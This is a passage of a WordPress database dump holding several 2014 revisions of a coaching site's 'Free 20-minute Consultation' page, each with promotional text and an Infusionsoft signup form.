method="POST"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /><input name="inf_form_name" type="hidden" value="CYB 20 min free consult w/ Ebook" /><input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City"> City</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_State"> State</label>\r\n\r\n<input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Country"> Country</label>\r\n\r\n<select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select>\r\n\r\n</div>\r\n</form></div>\r\n<div style="width: 47%; float: left;">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Phone1">Phone Number</label>\r\n\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_Timetocontact">Best time to reach me by phone.</label>\r\n\r\n<input id="inf_custom_Timetocontact" class="infusion-field-input-container" name="inf_custom_Timetocontact" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit" style="margin: 60px auto; float: right;">\r\n\r\n<input type="submit" value="Submit" />\r\n\r\n</div>\r\n</div>\r\n</div>', 'Free 20-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-07-04 16:33:24', '2014-07-04 21:33:24', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0),
(1240, 4194, '2014-07-04 16:35:10', '2014-07-04 21:35:10', '<h1 style="text-align: center;">Free 20-minute Consultation\r\nwith a Clear Your Beliefs Coach</h1>\r\nWould you like to find out whether Clear Your Beliefs is right for you?\r\n\r\nRegister for a free 20-minute consultation with a professional <em>Clear Your Beliefs Coach</em>.  He or she will answer your questions, and give you a taste of what''s possible with our program.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "Transform Your Beliefs," as a gift.  It''s a beautiful primer on beliefs and the Clear Your Beliefs program.\r\n\r\nFill out this form to schedule your 20-minute consultation.  A Clear Your Beliefs Coach will respond to you within 72 hours.\r\n\r\nMany people find this initial consultation so valuable that they want to go deeper immediately.  After 20-minutes, your Coach will offer you the option of extending your session to a full hour, at additional cost.\r\n\r\nWe''d love to get your feedback after you have your 20-minute consultation. Please write to us at support@clearyourbeliefs.com, and let us know about your experience.\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 100%; margin: 30px auto; min-height: 600px;">\r\n\r\n<h1 style="text-align: center;">Schedule Your Free 20-minute Consultation</h1>\r\n<div style="width: 47%; float: left;"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/fce61116f5a9a85d3022cf39699950ce" method="POST"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /><input name="inf_form_name" type="hidden" value="CYB 20 min free consult w/ Ebook" /><input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City"> City</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_State"> State</label>\r\n\r\n<input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Country"> Country</label>\r\n\r\n<select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select>\r\n\r\n</div>\r\n</form></div>\r\n<div style="width: 47%; float: left;">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Phone1">Phone Number</label>\r\n\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_Timetocontact">Best time to reach me by phone.</label>\r\n\r\n<input id="inf_custom_Timetocontact" class="infusion-field-input-container" name="inf_custom_Timetocontact" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit" style="margin: 60px auto; float: right;">\r\n\r\n<input type="submit" value="Submit" />\r\n\r\n</div>\r\n</div>\r\n</div>', 'Free 20-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-07-04 16:35:10', '2014-07-04 21:35:10', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0),
(1239, 4194, '2014-07-04 16:34:27', '2014-07-04 21:34:27', '<h1 style="text-align: center;">Free 20-minute Consultation\r\nwith a Clear Your Beliefs Coach</h1>\r\nWould you like to find out whether Clear Your Beliefs is right for you?\r\n\r\nRegister for a free 20-minute consultation with a professional <em>Clear Your Beliefs Coach</em>.  He or she will answer your questions, and give you a taste of what''s possible with our program.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "Transform Your Beliefs," as a gift.  It''s a beautiful primer on beliefs and the Clear Your Beliefs program.\r\n\r\nFill out this form to schedule your 20-minute consultation.  A Clear Your Beliefs Coach will respond to you within 72 hours.\r\n\r\nMany people find this initial consultation so valuable that they want to go deeper immediately.  After 20-minutes, your Coach will offer you the option of extending your session to a full hour, at additional cost.\r\n\r\nWe''d love to get your feedback after you have your 20-minute consultation. Please write to us at support@clearyourbeliefs.com, and let us know about your experience.\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 100%; margin: 30px auto; min-height: 600px;">\r\n\r\n&nbsp;\r\n<h1 style="text-align: center;">Schedule Your Free 20-minute Consultation</h1>\r\n<div style="width: 47%; float: left;"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/fce61116f5a9a85d3022cf39699950ce" method="POST"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /><input name="inf_form_name" type="hidden" value="CYB 20 min free consult w/ Ebook" /><input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City"> City</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_State"> State</label>\r\n\r\n<input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Country"> Country</label>\r\n\r\n<select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option 